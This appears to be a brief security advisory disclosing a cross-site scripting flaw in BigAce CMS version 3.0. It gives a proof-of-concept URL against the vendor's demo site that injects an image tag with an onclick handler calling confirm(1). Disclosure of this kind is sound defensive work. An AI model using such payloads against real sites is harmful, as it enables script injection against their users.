BigAce CMS version 3.0 suffers from a cross site scripting vulnerability.
8f572ab6f103e93d3874e315dc938ee02140a8b6aa7dd8cae48a26bed59ca897
# Affected software: bigace cmc
# Type of vulnerability:cross site scripting
# URL:http://demo.bigace.de/
# Discovered by: provensec
# Website: provensec.com
#version: 3.0
# Proof of concept
http://site/xsspayload
demo:http://demo.bigace.de/%22%3E%3Cimg%20src=d%20onclick=confirm%281%29;%3E